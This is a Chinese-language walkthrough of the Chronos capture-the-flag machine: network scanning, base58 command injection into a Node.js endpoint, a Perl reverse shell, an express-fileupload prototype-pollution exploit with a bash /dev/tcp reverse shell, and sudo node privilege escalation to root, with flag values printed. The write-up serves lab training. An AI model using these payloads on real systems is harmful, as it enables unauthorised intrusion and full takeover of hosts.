本次渗透测试我将使用cs来辅助进行渗透:
打点
主机存活发现:
┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.56.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00039s latency).
Nmap scan report for 192.168.56.102
Host is up (0.013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.86 seconds
目标主机IP:192.168.56.102
对目标进行扫描:
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.102
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:42 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0031s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:f2:83:a4:38:89:8d:86:a5:e1:31:76:eb:9d:5f:ea (RSA)
| 256 41:5a:21:c4:58:f2:2b:e4:8a:2f:31:73:ce:fd:37:ad (ECDSA)
|_ 256 9b:34:28:c2:b9:33:4b:37:d5:01:30:6f:87:c4:6b:23 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds
访问目标:
发现存在一个域名:chronos.local
将其添加到hosts文件解析,可以访问这个目标:
发现是一个输入字符串进行解析,字符串是**base58 **编码的,解析后得到:
4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
猜测可能存在代码执行,编写脚本:
import base58
import requests
def attack(command):
url = b'http://chronos.local:8000/date?format=%s' % base58.b58encode(command)
print(url)
payload={}
headers = {
'User-Agent': 'Chronos',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Origin': 'http://chronos.local',
'Connection': 'keep-alive',
'Referer': 'http://chronos.local/',
'If-None-Match': 'W/"2c-Nrqrq9OAfQyOcS4aQZ8VPoBAXks"'
}
response = requests.request("GET", url, headers=headers, data=payload)
return response.text
if __name__ == '__main__':
attack('&& ls')
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HEPzObbs-1648738788444)(https://s2.loli.net/2022/03/31/bgoscyKS4MJRV1h.png)]
查看源代码:
// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();
const port = 8000;
const cors = require('cors');
app.use(cors());
app.get('/', (req,res) =>{
res.sendFile("/var/www/html/index.html");
});
app.get('/date', (req, res) => {
var agent = req.headers['user-agent'];
var cmd = 'date ';
const format = req.query.format;
const bytes = bs58.decode(format);
var decoded = bytes.toString();
var concat = cmd.concat(decoded);
if (agent === 'Chronos') {
if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {
res.send("Something went wrong");
}
exec(concat, (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
res.send(stdout);
});
}
else{
res.send("Permission Denied");
}
})
app.listen(port,() => {
console.log(`Server running at ${port}`);
})
过滤了一些字符,不能用简单的bash反弹shell,查看程序安装了什么程序:
存在一个perl,可以使用其进行反弹shell:
attack('&&perl -e \'use Socket;$i="192.168.56.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'')
kali开启监听,成功反弹,但是读取user.txt权限不够
切换用户
查看网络连接:
本地开放了个8080 端口,访问发现存在一个服务,发现存在一个本地的服务,存在一个第二个版本,在**/opt/chronos-v2/backend 目录下,**查看package.json:
{
"name": "some-website",
"version": "1.0.0",
"description": "",
"main": "server.js",
"scripts": {
"start": "node server.js"
},
"author": "",
"license": "ISC",
"dependencies": {
"ejs": "^3.1.5",
"express": "^4.17.1",
"express-fileupload": "^1.1.7-alpha.3"
}
}
server.js
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')
const app = express();
app.use(fileupload({ parseNested: true }));
app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");
app.get('/', (req, res) => {
res.render('index')
});
const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
console.log('Server listening on ' + addr + ' port ' + port);
});
这个express-fileupload存在原型链污染,可以直接使用exp:
exp.py
import requests
### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.101/8020 0>&1"'
print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})
### execute command
requests.get('http://127.0.0.1:8080')
print("Finished!")
监听8020端口,成功getshell:
user.txt
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
提权
可以看到node可以以root权限执行,并且不需要密码,可以利用node 运行脚本提权:
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
root.txt:
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK